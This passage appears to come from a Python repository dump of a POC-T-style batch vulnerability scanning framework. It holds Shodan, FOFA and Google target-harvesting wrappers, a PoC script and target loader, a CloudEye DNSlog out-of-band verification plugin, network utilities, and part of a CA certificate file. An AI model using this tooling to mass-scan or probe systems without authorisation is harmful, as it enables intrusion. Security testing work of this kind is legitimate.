file: %s.' % paths.CONFIG_PATH 23 | logger.info(msg) 24 | self.api_key = ConfigFileParser().ShodanApikey() 25 | 26 | if not self.api_key: 27 | msg = 'Automatic authorization failed.' 28 | logger.warning(msg) 29 | msg = 'Please input your Shodan API Key (https://account.shodan.io/).' 30 | logger.info(msg) 31 | self.api_key = raw_input('API KEY > ').strip() 32 | 33 | def account_info(self): 34 | try: 35 | api = shodan.Shodan(self.api_key) 36 | account_info = api.info() 37 | msg = "Available Shodan query credits: %d" % account_info.get('query_credits') 38 | logger.info(msg) 39 | except APIError as e: 40 | sys.exit(logger.error(e)) 41 | return True 42 | 43 | def api_query(self): 44 | try: 45 | api = shodan.Shodan(self.api_key) 46 | result = api.search(query=self.query, offset=self.offset, limit=self.limit) 47 | except APIError as e: 48 | sys.exit(logger.error(e)) 49 | 50 | if 'matches' in result: 51 | anslist = [] 52 | for match in result.get('matches'): 53 | anslist.append(match.get('ip_str') + ':' + str(match.get('port'))) 54 | self.result = anslist 55 | else: 56 | self.result = [] 57 | 58 | 59 | def ShodanSearch(query, limit, offset=0): 60 | s = ShodanBase(query, limit, offset) 61 | s.login() 62 | s.account_info() 63 | s.api_query() 64 | return s.result 65 | -------------------------------------------------------------------------------- /lib/api/fofa/pack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # project = https://github.com/Xyntax/POC-T 4 | # author = bit4 5 | 6 | import sys 7 | from lib.core.data import paths, logger 8 | from lib.utils.config import ConfigFileParser 9 | from lib.core.common import getSafeExString 10 | import getpass 11 | import urllib 12 | import base64 13 | import json 14 | 15 | 16 | def check(email, key): 17 | if email and key: 18 | auth_url = "https://fofa.so/api/v1/info/my?email={0}&key={1}".format(email, key) 19 | try: 20 | response = urllib.urlopen(auth_url) 21 | if response.code == 200: 22 | return True 23 | except Exception as e: 24 | # logger.error(e) 25 | return False 26 | return False 27 | 28 | 29 | def FofaSearch(query, limit=100, offset=0): # TODO 付费获取结果的功能实现 30 | try: 31 | msg = 'Trying to login with credentials in config file: %s.' % paths.CONFIG_PATH 32 | logger.info(msg) 33 | email = ConfigFileParser().FofaEmail() 34 | key = ConfigFileParser().FofaKey() 35 | if check(email, key): 36 | pass 37 | else: 38 | raise # will go to except block 39 | except: 40 | msg = 'Automatic authorization failed.' 41 | logger.warning(msg) 42 | msg = 'Please input your FoFa Email and API Key below.' 43 | logger.info(msg) 44 | email = raw_input("Fofa Email: ").strip() 45 | key = getpass.getpass(prompt='Fofa API Key: ').strip() 46 | if not check(email, key): 47 | msg = 'Fofa API authorization failed, Please re-run it and enter a valid key.' 48 | sys.exit(logger.error(msg)) 49 | 50 | query = base64.b64encode(query) 51 | 52 | request = "https://fofa.so/api/v1/search/all?email={0}&key={1}&qbase64={2}".format(email, key, query) 53 | result = [] 54 | try: 55 | response = urllib.urlopen(request) 56 | resp = response.readlines()[0] 57 | resp = json.loads(resp) 58 | if resp["error"] is None: 59 | for item in resp.get('results'): 60 | result.append(item[0]) 61 | if resp.get('size') >= 100: 62 | logger.info("{0} items found! just 100 returned....".format(resp.get('size'))) 63 | except Exception as e: 64 | sys.exit(logger.error(getSafeExString(e))) 65 | finally: 66 | return result 67 | -------------------------------------------------------------------------------- /lib/cli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | #! *-* coding:utf8 -*- 3 | # author syst1m 4 | 5 | import os.path 6 | import traceback 7 | from lib.parse.cmdline import cmdLineParser 8 | from lib.core.option import initOptions 9 | from lib.controller.loader import loadModule, loadPayloads 10 | from lib.core.common import setPaths, banner, systemQuit, openBrowser 11 | from lib.core.data import paths, conf, logger, cmdLineOptions 12 | from lib.core.enums import EXIT_STATUS 13 | from lib.core.settings import IS_WIN 14 | from lib.core.exception import ToolkitUserQuitException 15 | from lib.core.exception import ToolkitMissingPrivileges 16 | from lib.core.exception import ToolkitSystemException 17 | from lib.controller.engine import run 18 | from thirdparty.colorama.initialise import init as winowsColorInit 19 | 20 | 21 | def main(): 22 | """ 23 | Main function of POC-T when running from command line. 24 | """ 25 | try: 26 | paths.ROOT_PATH = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) 27 | try: 28 | os.path.isdir(paths.ROOT_PATH) 29 | except UnicodeEncodeError: 30 | errMsg = "your system does not properly handle non-ASCII paths. " 31 | errMsg += "Please move the project root directory to another location" 32 | logger.error(errMsg) 33 | raise SystemExit 34 | setPaths() 35 | 36 | cmdLineOptions.update(cmdLineParser().__dict__) 37 | initOptions(cmdLineOptions) 38 | 39 | if IS_WIN: 40 | winowsColorInit() 41 | banner() 42 | 43 | loadModule() 44 | loadPayloads() 45 | 46 | run() 47 | 48 | if conf.OPEN_BROWSER: 49 | openBrowser() 50 | 51 | systemQuit(EXIT_STATUS.SYSETM_EXIT) 52 | 53 | except ToolkitMissingPrivileges as e: 54 | logger.error(e) 55 | systemQuit(EXIT_STATUS.ERROR_EXIT) 56 | 57 | except ToolkitSystemException as e: 58 | logger.error(e) 59 | systemQuit(EXIT_STATUS.ERROR_EXIT) 60 | 61 | except ToolkitUserQuitException: 62 | systemQuit(EXIT_STATUS.USER_QUIT) 63 | except KeyboardInterrupt: 64 | systemQuit(EXIT_STATUS.USER_QUIT) 65 | 66 | except Exception: 67 | print(traceback.format_exc()) 68 | logger.warning('It seems like you reached a unhandled exception, please report it to author\'s mail:<1990758989@qq.com>.') 69 | 70 | if __name__ == "__main__": 71 | main() 72 | -------------------------------------------------------------------------------- /lib/core/datatype.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | import copy 6 | import types 7 | from lib.core.exception import ToolkitDataException 8 | 9 | 10 | class AttribDict(dict): 11 | """ 12 | This class defines the project object, inheriting from Python data 13 | type dictionary. 14 | 15 | >>> foo = AttribDict() 16 | >>> foo.bar = 1 17 | >>> foo.bar 18 | 1 19 | """ 20 | 21 | def __init__(self, indict=None, attribute=None): 22 | if indict is None: 23 | indict = {} 24 | 25 | # Set any attributes here - before initialisation 26 | # these remain as normal attributes 27 | self.attribute = attribute 28 | dict.__init__(self, indict) 29 | self.__initialised = True 30 | 31 | # After initialisation, setting attributes 32 | # is the same as setting an item 33 | 34 | def __getattr__(self, item): 35 | """ 36 | Maps values to attributes 37 | Only called if there *is NOT* an attribute with this name 38 | """ 39 | 40 | try: 41 | return self.__getitem__(item) 42 | except KeyError: 43 | raise ToolkitDataException("unable to access item '%s'" % item) 44 | 45 | 46 | def __setattr__(self, item, value): 47 | """ 48 | Maps attributes to values 49 | Only if we are initialised 50 | """ 51 | 52 | # This test allows attributes to be set in the __init__ method 53 | if "_AttribDict__initialised" not in self.__dict__: 54 | return dict.__setattr__(self, item, value) 55 | 56 | # Any normal attributes are handled normally 57 | elif item in self.__dict__: 58 | dict.__setattr__(self, item, value) 59 | 60 | else: 61 | self.__setitem__(item, value) 62 | 63 | def __getstate__(self): 64 | return self.__dict__ 65 | 66 | def __setstate__(self, dict): 67 | self.__dict__ = dict 68 | 69 | def __deepcopy__(self, memo): 70 | retVal = self.__class__() 71 | memo[id(self)] = retVal 72 | 73 | for attr in dir(self): 74 | if not attr.startswith('_'): 75 | value = getattr(self, attr) 76 | if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)): 77 | setattr(retVal, attr, copy.deepcopy(value, memo)) 78 | 79 | for key, value in self.items(): 80 | retVal.__setitem__(key, copy.deepcopy(value, memo)) 81 | 82 | return retVal 83 | -------------------------------------------------------------------------------- /plugin/cloudeye.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # auther = Syst1m 4 | 5 | 6 | """ 7 | CloudEye API 8 | 9 | Usage: 10 | c = CloudEye() 11 | a = c.getRandomDomain('cdxy') 12 | try: 13 | requests.get('http://' + a, timeout=1) 14 | except Exception: 15 | pass 16 | print c.verifyDNS(delay=0) 17 | print c.verifyHTTP(delay=0) 18 | print c.getDnsRecord(delay=0) 19 | print c.getHttpRecord(delay=0) 20 | """ 21 | 22 | import random 23 | import requests 24 | import time 25 | from string import ascii_lowercase 26 | from lib.utils.config import ConfigFileParser 27 | 28 | # load once for all thread 29 | key = ConfigFileParser().CloudEyeApikey() 30 | uniq_domain = ConfigFileParser().ColudEyePersonaldomain().split('.')[0] 31 | 32 | 33 | class CloudEye: 34 | def __init__(self): 35 | self.unique = uniq_domain 36 | self.random = ''.join([random.choice(ascii_lowercase) for _ in range(10)]) 37 | 38 | def getRandomDomain(self, custom='poc'): 39 | """ 40 | full domain = [random].[custom].[unique].dnslog.info 41 | e.g. fezarvgo.poc.ee8a6f.dnslog.info 42 | """ 43 | self.custom = custom 44 | return '%s.%s.%s.dnslog.info' % (self.random, self.custom, self.unique) 45 | 46 | def getDnsRecord(self, delay=2): 47 | time.sleep(delay) 48 | query = self.random + '.' + self.custom 49 | api_base = 'http://cloudeye.me/api/{key}/{domain}/DNSLog/'.format(key=key, domain=query) 50 | return requests.post(api_base).content 51 | 52 | def getHttpRecord(self, delay=2): 53 | time.sleep(delay) 54 | query = self.random + '.' + self.custom 55 | api_base = 'http://cloudeye.me/api/{key}/{domain}/ApacheLog/'.format(key=key, domain=query) 56 | return requests.post(api_base).content 57 | 58 | def verifyDNS(self, delay=2): 59 | return 'dnslog.info' in self.getDnsRecord(delay) 60 | 61 | def verifyHTTP(self, delay=2): 62 | return 'dnslog.info' in self.getHttpRecord(delay) 63 | 64 | 65 | def queryDnsRecord(domain, delay=2): 66 | time.sleep(delay) 67 | domain = domain.replace(uniq_domain + '.dnslog.info', '').rstrip('.') 68 | api_base = 'http://cloudeye.me/api/{key}/{domain}/DNSLog/'.format(key=key, domain=domain) 69 | return requests.post(api_base).content 70 | 71 | 72 | def queryHttpRecord(domain, delay=2): 73 | time.sleep(delay) 74 | domain = domain.replace(uniq_domain + '.dnslog.info', '').rstrip('.') 75 | api_base = 'http://cloudeye.me/api/{key}/{domain}/ApacheLog/'.format(key=key, domain=domain) 76 | return requests.post(api_base).content 77 | 78 | 79 | 80 | 81 | -------------------------------------------------------------------------------- /lib/controller/loader.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | import queue 6 | import sys 7 | import imp 8 | import os 9 | from lib.core.data import th, conf, logger, paths 10 | from lib.core.enums import API_MODE_NAME, TARGET_MODE_STATUS 11 | from lib.core.settings import ESSENTIAL_MODULE_METHODS 12 | from lib.core.exception import ToolkitValueException 13 | from lib.controller.api import runApi 14 | from thirdparty.IPy import IPy 15 | 16 | 17 | def loadModule(): 18 | _name = conf.MODULE_NAME 19 | msg = 'Load custom script: %s' % _name 20 | logger.success(msg) 21 | 22 | fp, pathname, description = imp.find_module(os.path.splitext(_name)[0], [paths.SCRIPT_PATH]) 23 | try: 24 | th.module_obj = imp.load_module("_", fp, pathname, description) 25 | for each in ESSENTIAL_MODULE_METHODS: 26 | if not hasattr(th.module_obj, each): 27 | errorMsg = "Can't find essential method:'%s()' in current script,Please modify your script/PoC." 28 | sys.exit(logger.error(errorMsg)) 29 | except ImportError as e: 30 | errorMsg = "Your current scipt [%s.py] caused this exception\n%s\n%s" \ 31 | % (_name, '[Error Msg]: ' + str(e), 'Maybe you can download this module from pip or easy_install') 32 | sys.exit(logger.error(errorMsg)) 33 | 34 | 35 | def loadPayloads(): 36 | infoMsg = 'Initialize targets...' 37 | logger.success(infoMsg) 38 | th.queue = queue.Queue() 39 | if conf.TARGET_MODE is TARGET_MODE_STATUS.RANGE: 40 | int_mode() 41 | elif conf.TARGET_MODE is TARGET_MODE_STATUS.FILE: 42 | file_mode() 43 | elif conf.TARGET_MODE is TARGET_MODE_STATUS.IPMASK: 44 | net_mode() 45 | elif conf.TARGET_MODE is TARGET_MODE_STATUS.SINGLE: 46 | single_target_mode() 47 | elif conf.TARGET_MODE is TARGET_MODE_STATUS.API: 48 | api_mode() 49 | 50 | else: 51 | raise ToolkitValueException('conf.TARGET_MODE value ERROR.') 52 | logger.success('Total: %s' % str(th.queue.qsize())) 53 | 54 | 55 | def file_mode(): 56 | for line in open(conf.INPUT_FILE_PATH): 57 | sub = line.strip() 58 | if sub: 59 | th.queue.put(sub) 60 | 61 | 62 | def int_mode(): 63 | _int = conf.I_NUM2.strip().split('-') 64 | for each in range(int(_int[0].strip()), int(_int[1].strip())): 65 | th.queue.put(str(each)) 66 | 67 | 68 | def net_mode(): 69 | ori_str = conf.NETWORK_STR 70 | try: 71 | _list = IPy.IP(ori_str) 72 | except Exception as e: 73 | sys.exit(logger.error('Invalid IP/MASK,%s' % e)) 74 | for each in _list: 75 | th.queue.put(str(each)) 76 | 77 | 78 | def single_target_mode(): 79 | th.queue.put(str(conf.SINGLE_TARGET_STR)) 80 | 81 | 82 | def api_mode(): 83 | conf.API_OUTPUT = os.path.join(paths.DATA_PATH, conf.API_MODE) 84 | if not os.path.exists(conf.API_OUTPUT): 85 | os.mkdir(conf.API_OUTPUT) 86 | 87 | file = runApi() 88 | for line in open(file): 89 | sub = line.strip() 90 | if sub: 91 | th.queue.put(sub) -------------------------------------------------------------------------------- /lib/utils/console.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | import os 6 | 7 | __all__ = ['getTerminalSize'] 8 | 9 | 10 | def getTerminalSize(): 11 | import platform 12 | current_os = platform.system() 13 | tuple_xy = None 14 | if current_os == 'Windows': 15 | tuple_xy = _getTerminalSize_windows() 16 | if tuple_xy is None: 17 | tuple_xy = _getTerminalSize_tput() 18 | # needed for window's python in cygwin's xterm! 19 | if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'): 20 | tuple_xy = _getTerminalSize_linux() 21 | if tuple_xy is None: 22 | print("default") 23 | tuple_xy = (80, 25) # default value 24 | return tuple_xy 25 | 26 | 27 | def _getTerminalSize_windows(): 28 | res = None 29 | try: 30 | from ctypes import windll, create_string_buffer 31 | 32 | # stdin handle is -10 33 | # stdout handle is -11 34 | # stderr handle is -12 35 | 36 | h = windll.kernel32.GetStdHandle(-12) 37 | csbi = create_string_buffer(22) 38 | res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi) 39 | except Exception: 40 | return None 41 | if res: 42 | import struct 43 | (bufx, bufy, curx, cury, wattr, 44 | left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw) 45 | sizex = right - left + 1 46 | sizey = bottom - top + 1 47 | return sizex, sizey 48 | else: 49 | return None 50 | 51 | def _getTerminalSize_tput(): 52 | # get terminal width 53 | # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window 54 | try: 55 | import subprocess 56 | proc = subprocess.Popen(["tput", "cols"], stdin=subprocess.PIPE, stdout=subprocess.PIPE) 57 | output = proc.communicate(input=None) 58 | cols = int(output[0]) 59 | proc = subprocess.Popen(["tput", "lines"], stdin=subprocess.PIPE, stdout=subprocess.PIPE) 60 | output = proc.communicate(input=None) 61 | rows = int(output[0]) 62 | return (cols, rows) 63 | except Exception: 64 | return None 65 | 66 | def _getTerminalSize_linux(): 67 | def ioctl_GWINSZ(fd): 68 | try: 69 | import fcntl, termios, struct 70 | cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234')) 71 | except Exception: 72 | return None 73 | return cr 74 | 75 | cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2) 76 | if not cr: 77 | try: 78 | fd = os.open(os.ctermid(), os.O_RDONLY) 79 | cr = ioctl_GWINSZ(fd) 80 | os.close(fd) 81 | except Exception: 82 | pass 83 | if not cr: 84 | try: 85 | cr = (env.get('LINES'), env.get('COLUMNS')) 86 | except Exception: 87 | return None 88 | return int(cr[1]), int(cr[0]) 89 | 90 | 91 | if __name__ == "__main__": 92 | sizex, sizey = getTerminalSize() 93 | print('width =', sizex, 'height =', sizey) 94 | -------------------------------------------------------------------------------- /lib/api/google/pack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # project = https://github.com/Xyntax/POC-T 4 | # author = i@cdxy.me 5 | 6 | import sys 7 | from googleapiclient.discovery import build 8 | from googleapiclient.errors import HttpError as ServerHttpDenied 9 | from lib.core.common import getSafeExString 10 | from lib.core.enums import PROXY_TYPE 11 | from lib.utils.config import ConfigFileParser 12 | from lib.core.data import logger, conf 13 | from thirdparty.httplib2 import Http, ProxyInfo 14 | from socket import error as SocketError 15 | 16 | 17 | def _initHttpClient(): 18 | if conf.GOOGLE_PROXY: 19 | proxy_str = conf.GOOGLE_PROXY 20 | elif ConfigFileParser().GoogleProxy(): 21 | proxy_str = ConfigFileParser().GoogleProxy() 22 | else: 23 | proxy_str = None 24 | 25 | if not proxy_str: 26 | return Http() 27 | 28 | msg = 'Proxy: %s' % proxy_str 29 | logger.info(msg) 30 | proxy = proxy_str.strip().split(' ') 31 | if len(proxy) != 3: 32 | msg = 'SyntaxError in GoogleProxy string, Please check your args or config file.' 33 | sys.exit(logger.error(msg)) 34 | if proxy[0].lower() == 'http': 35 | type = PROXY_TYPE.HTTP 36 | elif proxy[0].lower() == 'sock5': 37 | type = PROXY_TYPE.SOCKS5 38 | elif proxy[0].lower() == 'sock4': 39 | type = PROXY_TYPE.SOCKS4 40 | else: 41 | msg = 'Invalid proxy-type in GoogleProxy string, Please check your args or config file.' 42 | sys.exit(logger.error(msg)) 43 | try: 44 | port = int(proxy[2]) 45 | except ValueError: 46 | msg = 'Invalid port in GoogleProxy string, Please check your args or config file.' 47 | sys.exit(logger.error(msg)) 48 | else: 49 | http_client = Http(proxy_info=ProxyInfo(type, proxy[1], port)) 50 | return http_client 51 | 52 | 53 | def GoogleSearch(query, limit, offset=0): 54 | key = ConfigFileParser().GoogleDeveloperKey() 55 | engine = ConfigFileParser().GoogleEngine() 56 | if not key or not engine: 57 | msg = "Please config your 'developer_key' and 'search_enging' at toolkit.conf" 58 | sys.exit(logger.error(msg)) 59 | try: 60 | service = build("customsearch", "v1", http=_initHttpClient(), developerKey=key) 61 | 62 | result_info = service.cse().list(q=query, cx=engine).execute() 63 | msg = 'Max query results: %s' % str(result_info.get('searchInformation',{}).get('totalResults')) 64 | logger.info(msg) 65 | 66 | ans = set() 67 | limit += offset 68 | for i in range(int(offset / 10), int((limit + 10 - 1) / 10)): 69 | result = service.cse().list(q=query, cx=engine, num=10, start=i * 10 + 1).execute() 70 | if 'items' in result: 71 | for url in result.get('items'): 72 | ans.add(url.get('link')) 73 | return ans 74 | except SocketError: 75 | sys.exit(logger.error('Unable to connect Google, maybe agent/proxy error.')) 76 | except ServerHttpDenied as e: 77 | logger.warning('It seems like Google-Server denied this request.') 78 | sys.exit(logger.error(getSafeExString(e))) 79 | -------------------------------------------------------------------------------- /lib/core/register.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | 6 | 7 | """ 8 | 用于注册互斥的参数并给出错误提示 9 | 10 | Register() 11 | start 最少通过量 12 | stop 最大通过量 13 | mutex 互斥开关 14 | mutex_errmsg 错误提示 15 | 16 | add() 17 | perform 目标函数 18 | trigger 触发条件 19 | args 参数传入 20 | kwargs 参数传入 21 | 22 | Usage: 23 | r = Register() 24 | r.add(function1,1>1) 25 | r.add(function2,2>1) 26 | r.add(function3,3>1) 27 | r.run() 28 | 29 | """ 30 | 31 | import types 32 | import sys 33 | from lib.core.data import logger 34 | from lib.core.exception import RegisterDataException, RegisterMutexException, RegisterValueException 35 | 36 | 37 | class Register: 38 | def __init__(self, start=1, stop=1, mutex_errmsg=None, mutex=True): 39 | self.targets = [] 40 | self.mutex = mutex 41 | self.start = start 42 | self.stop = stop 43 | self.mutex_errmsg = mutex_errmsg 44 | self.verified = [] 45 | 46 | def enable_mutex(self): 47 | self.mutex = True 48 | 49 | def set_mutex_errmsg(self, s): 50 | self.mutex_errmsg = str(s) 51 | 52 | def add(self, perform, trigger, args=(), kwargs=None): 53 | if kwargs is None: 54 | kwargs = {} 55 | d = {'perform': perform, 'args': args, 'kwargs': kwargs, 'trigger': trigger} 56 | self.targets.append(d) 57 | self.__args = args 58 | self.__kwargs = kwargs 59 | 60 | def run(self): 61 | self.__pretreat() 62 | for target in self.verified: 63 | if not target.get('perform'): 64 | msg = 'Register has no verified target' 65 | raise RegisterDataException(msg) 66 | target.get('perform')(*target.get('args'), **target.get('kwargs')) 67 | 68 | def __pretreat(self): 69 | self.__input_vector_check() 70 | for __target in self.targets: 71 | __trigger = __target.get('trigger') 72 | if type(__trigger) == bool or type(__trigger) == str: 73 | if __trigger: 74 | self.verified.append(__target) 75 | else: 76 | msg = '[Trigger Type Error] Expected:boolean,found:' + str(type(__trigger)) 77 | raise RegisterValueException(msg) 78 | self.__mutex_check() 79 | 80 | def __mutex_check(self): 81 | if self.mutex: 82 | if len(self.verified) < self.start or len(self.verified) > self.stop: 83 | if self.mutex_errmsg is None: 84 | raise RegisterMutexException('mutex error,verified func count: ' + str(len(self.verified))) 85 | else: 86 | sys.exit(logger.error(self.mutex_errmsg)) 87 | 88 | 89 | def __input_vector_check(self): 90 | if type(self.stop) ==int and type(self.start) ==int and type( 91 | self.mutex) == bool: 92 | pass 93 | else: 94 | raise RegisterValueException('Register init func type error') 95 | if len(self.targets) is 0: 96 | msg = 'no target' 97 | raise RegisterDataException(msg) 98 | if self.start > self.stop: 99 | msg = 'start > stop' 100 | raise RegisterDataException(msg) -------------------------------------------------------------------------------- /plugin/util.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # auther = Syst1m 4 | 5 | import random 6 | import hashlib 7 | import requests 8 | import socket 9 | import re 10 | from string import ascii_lowercase,digits 11 | 12 | """ 13 | ascii_letters方法的作用是生成全部字母,包括a-z,A-Z 14 | digits方法的作用是生成数组,包括0-9 15 | """ 16 | #from urlparse import urlparse 17 | from urllib import parse 18 | 19 | def randomString(length=8): 20 | """ 21 | 生成随机字母串 22 | 23 | :param length:生成字符串长度 24 | :return 字母串 25 | 26 | join 将指定字符串用特定字符连接起来 27 | 随机八位小写字母 28 | """ 29 | 30 | return ''.join([random.choice(ascii_lowercase) for _ in range(length)]) 31 | 32 | def randomDigits(length=8): 33 | """ 34 | 随机数字串 35 | """ 36 | return ''.join([random.choice(digits) for _ in range(length)]) 37 | 38 | def randomMD5(length=10, hex=True): 39 | """ 40 | 生成随机MD5键值对 41 | 42 | :param length:指定明文长度 43 | :param hex:指定密文长度为32位 44 | :returns 原文,密文(32位或16位) 45 | """ 46 | plain = randomDigits(length) 47 | m = hashlib.md5() 48 | m.update(plain) 49 | cipher = m.hexdigest() if hex else m.hexdigest()[8:-8] 50 | return [plain, cipher] 51 | 52 | 53 | def redirectURL(url,timeout=3): 54 | 55 | """ 56 | 获取跳转后的真实url 57 | 58 | :param url:原始url 59 | :param timeout:超时时间 60 | :return 跳转后的真实url 61 | """ 62 | try: 63 | url = url if '://' in url else 'http://' + url 64 | r= requests.get(url,allow_redirects=False, timeout=timeout) 65 | return r.headers.get('localtion') if r.status_code == 302 else url 66 | except Exception: 67 | return url 68 | 69 | 70 | def host2IP(url): 71 | 72 | """ 73 | URL转IP 74 | 75 | :param url:原始url 76 | :return IP:post 77 | :expect 返回原始url 78 | """ 79 | 80 | for offset in url: 81 | if offset.isalpha(): #isalpha()检测字符串中是否只包含字母 82 | break 83 | else: 84 | return url 85 | try: 86 | url = url if '://' in url else 'http://' + url 87 | url = paese.urlparse(url).netloc # 域名 88 | ans = [i for i in socket.getaddrinfo(url.split(':')[0], None)[0][4] if i != 0][0] 89 | print(ans) 90 | if ':' in url: 91 | ans += ':' + url.split(':')[1] 92 | return ans 93 | except Exception: 94 | return url 95 | 96 | def IP2domain(base, timeout=3): 97 | 98 | """ 99 | IP转域名 100 | :param base:原始IP 101 | :param timeout:超时时间 102 | :return 域名 / False 103 | :except 返回False 104 | """ 105 | try: 106 | domains = set() 107 | ip = base.split(':')[0] if ':' in base else base 108 | q = "https://www.bing.com/search?q=ip%3A" + ip 109 | c = requests.get(url=q, 110 | headers={ 111 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'}, 112 | timeout=timeout 113 | ).content 114 | p = re.compile(r'(.*?)') # 生成正则,避免重复生成使用 115 | l = re.findall(p, c) 116 | for each in l: 117 | domain = each.split('://')[-1].split('/')[0] 118 | domains.add(domain) 119 | if len(domains) > 0: 120 | ans_1 = base + ' -> ' 121 | for each in domains: 122 | ans_1 += '|' + each 123 | return ans_1 124 | else: 125 | return False 126 | except Exception: 127 | return False 128 | 129 | 130 | def checkPortTcp(target,port,timeout=3): 131 | 132 | """ 133 | return True / False 134 | except 返回False 135 | """ 136 | sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 137 | sk.settimeout(timeout) 138 | try: 139 | sk.connect((target,port)) 140 | return True 141 | except Exception: 142 | return False 143 | -------------------------------------------------------------------------------- /thirdparty/httplib2/test/other_cacerts.txt: -------------------------------------------------------------------------------- 1 | # Certifcate Authority certificates for validating SSL connections. 2 | # 3 | # This file contains PEM format certificates generated from 4 | # http://mxr.mozilla.org/seamonkey/source/security/nss/lib/ckfw/builtins/certdata.txt 5 | # 6 | # ***** BEGIN LICENSE BLOCK ***** 7 | # Version: MPL 1.1/GPL 2.0/LGPL 2.1 8 | # 9 | # The contents of this file are subject to the Mozilla Public License Version 10 | # 1.1 (the "License"); you may not use this file except in compliance with 11 | # the License. You may obtain a copy of the License at 12 | # http://www.mozilla.org/MPL/ 13 | # 14 | # Software distributed under the License is distributed on an "AS IS" basis, 15 | # WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License 16 | # for the specific language governing rights and limitations under the 17 | # License. 18 | # 19 | # The Original Code is the Netscape security libraries. 20 | # 21 | # The Initial Developer of the Original Code is 22 | # Netscape Communications Corporation. 23 | # Portions created by the Initial Developer are Copyright (C) 1994-2000 24 | # the Initial Developer. All Rights Reserved. 25 | # 26 | # Contributor(s): 27 | # 28 | # Alternatively, the contents of this file may be used under the terms of 29 | # either the GNU General Public License Version 2 or later (the "GPL"), or 30 | # the GNU Lesser General Public License Version 2.1 or later (the "LGPL"), 31 | # in which case the provisions of the GPL or the LGPL are applicable instead 32 | # of those above. If you wish to allow use of your version of this file only 33 | # under the terms of either the GPL or the LGPL, and not to allow others to 34 | # use your version of this file under the terms of the MPL, indicate your 35 | # decision by deleting the provisions above and replace them with the notice 36 | # and other provisions required by the GPL or the LGPL. If you do not delete 37 | # the provisions above, a recipient may use your version of this file under 38 | # the terms of any one of the MPL, the GPL or the LGPL. 39 | # 40 | # ***** END LICENSE BLOCK ***** 41 | 42 | 43 | Comodo CA Limited, CN=Trusted Certificate Services 44 | ================================================== 45 | 46 | -----BEGIN CERTIFICATE----- 47 | MIIEQzCCAyugAwIBAgIBATANBgkqhkiG9w0BAQUFADB/MQswCQYDVQQGEwJHQjEb 48 | MBkGA1UECAwSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHDAdTYWxmb3JkMRow 49 | GAYDVQQKDBFDb21vZG8gQ0EgTGltaXRlZDElMCMGA1UEAwwcVHJ1c3RlZCBDZXJ0 50 | aWZpY2F0ZSBTZXJ2aWNlczAeFw0wNDAxMDEwMDAwMDBaFw0yODEyMzEyMzU5NTla 51 | MH8xCzAJBgNVBAYTAkdCMRswGQYDVQQIDBJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAO 52 | BgNVBAcMB1NhbGZvcmQxGjAYBgNVBAoMEUNvbW9kbyBDQSBMaW1pdGVkMSUwIwYD 53 | VQQDDBxUcnVzdGVkIENlcnRpZmljYXRlIFNlcnZpY2VzMIIBIjANBgkqhkiG9w0B 54 | AQEFAAOCAQ8AMIIBCgKCAQEA33FvNlhTWvI2VFeAxHQIIO0Yfyod5jWaHiWsnOWW 55 | fnJSoBVC21ndZHoa0Lh73TkVvFVIxO06AOoxEbrycXQaZ7jPM8yoMa+j49d/vzMt 56 | TGo87IvDktJTdyR0nAducPy9C1t2ul/y/9c3S0pgePfw+spwtOpZqqPOSC+pw7IL 57 | fhdyFgymBwwbOM/JYrc/oJOlh0Hyt3BAd9i+FHzjqMB6juljatEPmsbS9Is6FARW 58 | 1O24zG71++IsWL1/T2sr92AkWCTOJu80kTrV44HQsvAEAtdbtz6SrGsSivnkBbA7 59 | kUlcsutT6vifR4buv5XAwAaf0lteERv0xwQ1KdJVXOTt6wIDAQABo4HJMIHGMB0G 60 | A1UdDgQWBBTFe1i97doladL3WRaoszLAeydb9DAOBgNVHQ8BAf8EBAMCAQYwDwYD 61 | VR0TAQH/BAUwAwEB/zCBgwYDVR0fBHwwejA8oDqgOIY2aHR0cDovL2NybC5jb21v 62 | ZG9jYS5jb20vVHJ1c3RlZENlcnRpZmljYXRlU2VydmljZXMuY3JsMDqgOKA2hjRo 63 | dHRwOi8vY3JsLmNvbW9kby5uZXQvVHJ1c3RlZENlcnRpZmljYXRlU2VydmljZXMu 64 | Y3JsMA0GCSqGSIb3DQEBBQUAA4IBAQDIk4E7ibSvuIQSTI3S8NtwuleGFTQQuS9/ 65 | HrCoiWChisJ3DFBKmwCL2Iv0QeLQg4pKHBQGsKNoBXAxMKdTmw7pSqBYaWcOrp32 66 | pSxBvzwGa+RZzG0Q8ZZvH9/0BAKkn0U+yNj6NkZEUD+Cl5EfKNsYEYwq5GWDVxIS 67 | 